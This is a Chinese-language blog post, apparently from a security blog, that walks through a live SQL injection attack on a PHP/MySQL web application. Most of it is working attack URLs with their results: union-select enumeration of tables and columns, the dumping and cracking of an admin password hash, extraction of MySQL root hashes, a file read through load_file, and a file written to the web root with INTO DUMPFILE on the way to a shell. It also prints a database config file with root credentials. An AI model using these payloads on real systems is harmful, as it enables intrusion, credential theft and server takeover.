https://www.webshell.cc/answer_view.php?id=10291' //有注入
//常理走:报表。现在mysql几乎都是高级版本。所以一般就不猜测它的版本了。

https://www.webshell.cc/answer_view.php?id=10291%20and%202=4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

4,8,2

//上火狐,报表.

https://www.webshell.cc/answer_view.php?id=10291%20and%201=2%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20informati on_schema.tables%20where%20table_schema=database()
//表 结 构 :
admuser,admuser2,adn_anuncios,adn_foros,adn_foros_nuevos,adn_malas_palabras,adn_mensajes,adn_mensajes_nuevos,adn_paginas,adn_usuarios,answer,attach,book,case_history,classes,classes2,click,docs,export,getwell,lyb,lyb2,member,news,pinglun,proclasses,production,soft,vote,vote_sav e,zhidao

字段应该是user,username。之类的。还是爆吧。

https://www.webshell.cc/answer_view.php?id=10291%20and%201=2%20union%20select%201,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20infor mation_schema.columns%20where%20table_name=0x61646D75736572

/*

id,username,password,id,username,password

*/

剩下的就是查询了。2,4,8

https://www.webshell.cc/answer_view.php?id=10291%20and%201=2%20union%20select%201,username,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admuser
User: chen
Password:2a0e926d20b06f13601c729602a9f24e
解密: chen2011
//问题出现了。后台找不到
https://www.webshell.cc/manage/ //后来得知,是假的
/*陷入僵持了。

账号密码都出来了。后台找不到。想了想细节问题。我没判断什么用户,什么权限。以及数据库版本。

*/

https://www.webshell.cc/answer_view.php?id=10291%20and%202=4%20union%20select%201,user(),3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
root!

判断可否写入:

https://www.webshell.cc/answer_view.php?id=10291and(selectcount(*)fromMySQL.user)>0--
//回显正常:剩下的就是知道路径的问题了。数据库路径先看看。

https://www.webshell.cc/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex%28hex%28concat%280x5e5e5e,@@basedir,0x5e5e5e%29%29%29,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20--

//利用不上。
想到这,刚才直接爆库可以直接高级方式:

https://www.webshell.cc/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,group_concat(table_schema,0x3a,table_name),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20(select%20*%20from%20information_schema.tables%20order%20by%20tab le_schema%20limit%200,50)%20t%20%20--
//继续爆

https://www.webshell.cc/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,group_concat(user,0x3a,password),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%2 0from%20(select%20*%20from%20mysql.user%20order%20by%20user%20limit%200,50)%20t %20%20--
Root爆出来了。很遗憾。没有破解出来。

那么就要想到load_file函数了。

//参考Php安全新闻早8点(2011-11-13 星期日)

//http://hi.baidu.com/micropoor/blog/item/953acb6d896a6c7d0c33fac9.html

既然要load_file 就要查看magic_quotes_gpc 是off还是on了

 

没有报错。是off。

既然是win系统,那么不是阿帕奇,就是iis。根据返回来看,是iis。那就读配置文件。

https://www.webshell.cc/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,load_file(0x633a5c77696e646f77735c73797374656d33325c696e657473727 65c4d657461426173652e786d6c),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20--

注意Concat函数!

//参考php安全新闻Concat函数利用
/*返回正确,说明读取成功。看源码!

路径:D:\web\Micropoor

开始写入!

*/

https://www.webshell.cc/pinglun.php?id=7387%20and%201=2%20union%20select%200,concat(char(116),char(101),char(115),char(116),char(13),char(10)),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20into%20 dumpfile%20'd:%5C%5Cweb%5C%5CMicropoor%5C%5C1.txt'--
/*

写入成功,拿shell。提权。

D:/web/Micropoor/conn.php 配置文件

*/

$Host="localhost";

$Database="Micropoor";

$DbaUser ="root";

$DbaPassword="Micropoor";

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/2134.html